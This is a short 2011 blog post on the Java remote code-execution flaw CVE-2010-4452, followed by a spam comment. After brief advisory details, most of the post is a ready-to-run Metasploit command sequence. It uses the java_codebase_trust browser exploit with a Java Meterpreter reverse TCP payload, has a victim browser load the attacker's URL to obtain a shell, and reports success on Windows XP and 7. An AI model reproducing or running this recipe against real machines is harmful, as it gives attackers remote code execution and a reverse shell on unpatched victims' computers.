Saturday, 30 April 2011
JAVA CVE-2010-4452
CVE: CVE-2010-4452
Remote: Yes
Local: No
Published: Feb 15 2011 12:00AM
Updated: Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment.An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.This vulnerability affects the following supported versions:6 Update 23 and lower.
To exploit you can use the folloing systax on metasploit:
use windows/browser/java_codebase_trust
set SRVHOST 192.168.1.69
set SRVPORT 80
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.69
set LPORT 8888
exploit
Then open up the client browser and open the URL http://192.168.1.69/
You should get your shell!
I tested on windows XP and Windows 7, both worked fine, but it didn't worked on ubuntu.
Subscribe to:
Post Comments (Atom)
hi...
ReplyDeletei am Gaurav Garg From How To Hack A Computer
i like your web site or all available content but i like this post the most..
thanks for providing this information in this open way..
Regards
Gaurav garg
Keep Posting
Have A Nice day